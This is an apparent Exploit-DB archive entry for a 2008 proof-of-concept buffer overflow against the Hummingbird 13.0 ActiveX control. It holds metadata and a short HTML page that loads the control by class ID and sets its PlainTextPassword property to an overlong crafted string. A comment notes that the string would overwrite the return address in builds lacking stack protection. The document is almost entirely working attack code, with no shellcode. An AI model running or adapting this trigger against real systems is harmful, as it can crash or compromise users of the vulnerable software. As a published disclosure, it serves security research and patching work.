Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)

EDB-ID:

6761


Platform:

Windows

Published:

2008-10-16

<html>

<!--

the latest version of this activex (13.0) is compiled with /gs,  earlier versions aren't.
The XXXX would have overwritten return address.
by thomas.pollet@gmail.com

-->

<object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object>
<script language='vbscript'>
arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX"
target.PlainTextPassword = arg1

</script>
</html>


# milw0rm.com [2008-10-16]